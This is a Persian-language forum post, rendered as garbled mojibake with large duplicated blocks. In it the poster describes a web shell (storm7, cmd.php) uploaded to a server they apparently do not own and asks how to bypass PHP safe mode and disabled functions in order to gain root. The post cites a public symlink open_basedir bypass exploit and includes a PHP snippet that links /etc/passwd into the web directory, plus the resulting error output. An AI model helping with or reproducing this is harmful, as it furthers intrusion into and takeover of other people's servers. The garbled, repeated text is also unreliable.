سلام از یه سرور شل گرÙتم.(storm7) آپلود کردم Ùˆ هم از CMD.php استÙاده کردم
(Safe-Mode: ON (secure
Disabled PHP Functions: $df
اصلا نمی تونم command بزنم.وقتی توی cmd.php دستور می زنم :
shell_exec() has been disabled for security reasons in /home/.../.../.../public_html/images/cmd.php on line 23
تمام پست های مربوط به bypass رو خوندم.خواستم از bypasser معرو٠:
http://inj3ct0r.com/exploits/9586
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
استÙاده کنم.اما وقتی دستور ln رو Ù…ÛŒ نویسم Ùˆ روی create symlink میزنم.برمیگرده به home سایت Ùˆ هیچ عملی رو انØام نمیده
Linux 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:09:10 EDT 2010
i686
------------------------------------------------------------------------------
: disable_functions
: local value
readfile, system, shell_exec, proc_terminate, proc_nice, pclose, popen, passthru, pcntl_fork, pcntl_exec, posix_kill, pcntl_signal, ini_restore, posix_getpwuid, escapeshellarg, escapeshellcmd
: Master Value
readfile, system, shell_exec, proc_terminate, proc_nice, pclose, popen, passthru, pcntl_fork, pcntl_exec, posix_kill, pcntl_signal, ini_restore, posix_getpwuid, escapeshellarg, escapeshellcmd
-----------------------------------------------------------------------------
به راهنمایی یکی از دوستان میشه از Symlink استÙاده کرد
سوال من اینه Ú©Ù‡ بوسیله همین symlink میشه دستوراتی دیگه ای هم استÙاده کرد؟
آیا راهی هست که Safe mode رو off کرد و disable funciton ها رو از کار انداخت؟
چون می خوام root کنم روی سرور
-----------------------------------------------------------------------------
از این ****** استÙاده کردم Ùˆ error داد :
(Safe-Mode: ON (secure
Disabled PHP Functions: $df
اصلا نمی تونم command بزنم.وقتی توی cmd.php دستور می زنم :
shell_exec() has been disabled for security reasons in /home/.../.../.../public_html/images/cmd.php on line 23
تمام پست های مربوط به bypass رو خوندم.خواستم از bypasser معرو٠:
http://inj3ct0r.com/exploits/9586
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
استÙاده کنم.اما وقتی دستور ln رو Ù…ÛŒ نویسم Ùˆ روی create symlink میزنم.برمیگرده به home سایت Ùˆ هیچ عملی رو انØام نمیده
Linux 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:09:10 EDT 2010
i686
------------------------------------------------------------------------------
: disable_functions
: local value
readfile, system, shell_exec, proc_terminate, proc_nice, pclose, popen, passthru, pcntl_fork, pcntl_exec, posix_kill, pcntl_signal, ini_restore, posix_getpwuid, escapeshellarg, escapeshellcmd
: Master Value
readfile, system, shell_exec, proc_terminate, proc_nice, pclose, popen, passthru, pcntl_fork, pcntl_exec, posix_kill, pcntl_signal, ini_restore, posix_getpwuid, escapeshellarg, escapeshellcmd
-----------------------------------------------------------------------------
به راهنمایی یکی از دوستان میشه از Symlink استÙاده کرد
سوال من اینه Ú©Ù‡ بوسیله همین symlink میشه دستوراتی دیگه ای هم استÙاده کرد؟
آیا راهی هست که Safe mode رو off کرد و disable funciton ها رو از کار انداخت؟
چون می خوام root کنم روی سرور
-----------------------------------------------------------------------------
از این ****** استÙاده کردم Ùˆ error داد :
<?php
symlink('/etc/passwd','$pwd/user.txt');
?>
Warning: symlink() [function.symlink]: SAFE MODE Restriction in effect. The ****** whose uid is 100 is not allowed to access /etc/passwd owned by uid0 in /home/.../.../.../public_html/images/bypass5.php on line 2
symlink('/etc/passwd','$pwd/user.txt');
?>
Warning: symlink() [function.symlink]: SAFE MODE Restriction in effect. The ****** whose uid is 100 is not allowed to access /etc/passwd owned by uid0 in /home/.../.../.../public_html/images/bypass5.php on line 2
Comment